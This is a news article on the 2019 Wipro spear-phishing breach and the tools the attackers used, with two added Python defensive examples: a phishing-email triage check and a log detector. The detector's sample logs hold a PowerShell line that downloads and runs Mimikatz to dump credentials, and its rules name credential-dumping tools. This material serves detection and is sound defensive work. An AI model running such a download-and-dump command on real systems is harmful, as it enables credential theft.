May 2, 2019

A closer look at the Wipro security breach

By Luke Christou

Outsourcing consulting firm Wipro has remained tight-lipped since announcing that it has been targeted by an “advanced phishing campaign” earlier this month, but a new report from cybersecurity company Flashpoint has shed some light on the breach.

Hackers are thought to have gained access to Wipro’s internal IT systems months earlier and to have used that access to launch attacks on “at least a dozen” Wipro customers, KrebsOnSecurity reported soon after the announcement.

Flashpoint has uncovered evidence suggesting that the group has been in operation since at least 2017, if not earlier. The attack relied on infrastructure reused from past campaigns, and the password ‘!NetWire102015!’ was found on a number of the host or campaign IDs discovered.

So what do we know about the Wipro attackers, and how did they gain access to the company’s systems?

How did attackers infiltrate Wipro?

As initially revealed by Wipro, this was an advanced spear-phishing campaign designed to trick company employees into revealing confidential login information.

At least six different email templates were discovered, each encouraging victims to hand over their Windows login credentials. Some of the templates appeared to come from a security awareness training provider, seemingly to lull victims into a false sense of security.

These emails attempted to distribute Imminent Monitor, a remote access tool that gives the attacker administrative control of an infected machine. Other templates contained links to a site used to deliver Netwire, a remote access Trojan.
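The lure described above combines a trusted-looking sender (a security awareness training vendor) with a link that actually points at a credential-harvesting page. A first-pass triage check that catches that mismatch, as an added example that is not part of the original article or of Flashpoint’s report, is shown below. The sample message, its sender address and the link hosts are constructed placeholders, and the domain comparison is a deliberately crude last-two-labels approximation rather than a full public-suffix lookup.

```python
import re
from email import message_from_bytes, policy
from urllib.parse import urlparse

# Constructed sample (not one of the real Wipro templates): a lure that claims
# to come from a training vendor but sends the "sign in" link elsewhere.
SAMPLE_EMAIL = b"""From: "KnowledgeSafe Training" <notifications@training-vendor.example>
To: employee@wipro-client.example
Subject: Mandatory security awareness module due today
Content-Type: text/html; charset=utf-8

<html><body>
<p>Your annual security awareness training is overdue.</p>
<p><a href="http://login-portal-verify.example.net/owa/auth.php">Sign in with your Windows account</a> to complete it.</p>
<p>Questions? Visit <a href="https://training-vendor.example/help">our help centre</a>.</p>
</body></html>
"""

# Links are pulled from href attributes; a production filter would also
# decode tracking redirects and inspect text links.
URL_RE = re.compile(r"""href=["'](https?://[^"'\s>]+)""", re.IGNORECASE)

# Phrases typical of Windows/OWA credential lures (assumed list, not from the report).
CREDENTIAL_WORDS = ("sign in", "windows account", "password", "login", "verify your account")


def registered_domain(host):
    """Approximate eTLD+1 as the last two labels. Good enough for a triage check;
    use a public-suffix list in production (e.g. to handle co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def triage_message(raw):
    """Parse one raw RFC 5322 message and flag sender/link domain mismatches
    that co-occur with credential-lure wording."""
    msg = message_from_bytes(raw, policy=policy.default)
    sender = msg["From"].addresses[0]
    sender_domain = registered_domain(sender.domain)

    body = msg.get_body(preferencelist=("html", "plain")).get_content()
    links = URL_RE.findall(body)
    mismatched = [
        u for u in links
        if registered_domain(urlparse(u).hostname or "") != sender_domain
    ]
    lowered = body.lower()
    lure_terms = [w for w in CREDENTIAL_WORDS if w in lowered]

    return {
        "sender_name": sender.display_name,
        "sender_domain": sender_domain,
        "links": links,
        "mismatched_links": mismatched,
        "credential_lure_terms": lure_terms,
        # Both signals together: an off-domain link in a message asking for a login.
        "suspicious": bool(mismatched) and bool(lure_terms),
    }


if __name__ == "__main__":
    for key, value in triage_message(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

The point of requiring both signals is noise control: newsletters routinely link to CDNs and tracking hosts, so an off-domain link alone is weak evidence, but an off-domain link in a message that asks for a Windows login is exactly the pattern the Wipro templates used. Sender display names and From addresses are attacker-controlled, so this check should run alongside SPF/DKIM/DMARC results rather than replace them.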

Flashpoint believes that Windows credentials were targeted in order to gain access to Wipro’s encrypted email system.

Wipro’s email system is thought to have been compromised for some time. The hackers are said to have gained access to more than 100 Wipro systems which were subsequently used to launch attacks on clients.

What happened once the attackers were in?

According to Flashpoint, after breaching a system the attackers abused legitimate tools often used by red teams and penetration testers, seemingly to gather further confidential information for use in breaching Wipro clients while evading detection.

Once on a machine, the attackers dropped ScreenConnect, a legitimate remote access tool, which allowed them to take control of that machine at any time from a remote location.

Flashpoint also found Powerkatz (a build of Mimikatz packaged for loading from PowerShell) and PowerSploit scripts on domains used in the attack. These allow an attacker to search a system’s memory for credentials, tokens and other authentication artefacts after a breach.
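Because every tool named here is legitimate or dual-use, detection rests on the sequence rather than on any single file: hidden or encoded PowerShell, an in-memory credential-dumping module, and an unsanctioned remote-access client appearing on the same host. The script below, an added example that is not from the article or from Flashpoint, runs that logic over a handful of constructed log lines in a simplified "timestamp|host|event_id|detail" form approximating Windows process-creation (4688) and PowerShell script-block (4104) events. Hostnames, the IP address and the timestamps are invented; the rule names and the choice of indicator patterns are this example’s own assumptions.

```python
import re

# Constructed sample events (not real Wipro telemetry). The base64 in the first
# line is "IEX" in UTF-16LE, the form -EncodedCommand expects.
SAMPLE_LOGS = [
    "2019-04-02T09:14:03Z|WS-0417|4688|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc SQBFAFgA",
    "2019-04-02T09:14:05Z|WS-0417|4104|IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    "2019-04-02T09:20:41Z|WS-0417|4688|C:\\Users\\Public\\ScreenConnect.ClientSetup.msi",
    "2019-04-02T09:22:10Z|WS-0417|4688|C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3d4e5f6)\\ScreenConnect.ClientService.exe",
    "2019-04-02T10:02:00Z|WS-0512|4104|Get-ChildItem C:\\Users -Recurse | Measure-Object",
]

# Indicator patterns (assumed for this example; tune against your own baseline).
RULES = [
    ("powersploit_or_mimikatz_module",
     re.compile(r"Invoke-Mimikatz|Invoke-ReflectivePEInjection|PowerSploit|powerkatz|sekurlsa", re.I)),
    ("remote_download_cradle",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("hidden_encoded_powershell",
     re.compile(r"powershell(\.exe)?.*(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s)", re.I)),
    ("screenconnect_client",
     re.compile(r"ScreenConnect\.Client", re.I)),
]

# Rules that must all fire on one host before we call it the full chain.
CHAIN = ("hidden_encoded_powershell", "powersploit_or_mimikatz_module", "screenconnect_client")


def scan(lines):
    """Return one hit per (event, rule) match. maxsplit=3 keeps '|' inside the
    detail field (PowerShell pipelines) from breaking the parse."""
    hits = []
    for line in lines:
        ts, host, event_id, detail = line.split("|", 3)
        for name, pattern in RULES:
            if pattern.search(detail):
                hits.append({"time": ts, "host": host, "event_id": event_id, "rule": name})
    return hits


def hosts_with_chain(hits, required=CHAIN):
    """Hosts on which every rule in `required` fired: the post-compromise
    sequence the article describes, rather than a lone noisy indicator."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], set()).add(h["rule"])
    return sorted(host for host, rules in by_host.items() if set(required) <= rules)


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for h in found:
        print(f"{h['time']} {h['host']} {h['event_id']} {h['rule']}")
    print("hosts showing full chain:", hosts_with_chain(found))
```

Two caveats a practitioner should apply before deploying anything like this: the ScreenConnect rule must be allow-listed against sanctioned installs (the help desk may use the same product, and the attackers relied on exactly that ambiguity), and the encoded-PowerShell rule will fire on plenty of legitimate management scripts, which is why the example only escalates a host when all three stages co-occur.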

Insiders initially told KrebsOnSecurity that the breach was thought to be a state-sponsored attack. However, Flashpoint disputes this. Instead, it believes that the attackers were likely trying to gain access to the gift card and reward programme portals of Wipro clients for financial gain.

How can businesses protect against similar attacks?

Wipro says it has since “took remedial steps to contain and mitigate any potential impact”, which reportedly include building a new private email network to provide better security for its customers.

But with a spear-phishing attack costing businesses $1.6m on average, what can you do to stop your business from falling victim to a similar attack in the first place?


According to Asaf Cidon, Vice President of Content Security at Barracuda Networks, businesses need to invest in both technology solutions and employee awareness training in order to safeguard against such threats:

“Staying ahead of these types of attacks requires the right combination of technology and user training, so it’s critical to have a solution in place that detects and protects against spear-phishing attacks, including business email compromise, brand impersonation, and sextortion.”

Increasingly sophisticated tooling is being built to stop such compromises, including machine-learning email filters that flag impersonated senders and suspicious links before a message reaches an inbox.

However, training employees to spot a phishing email gives businesses a less costly line of defence, and one that still works when a lure slips past the filters.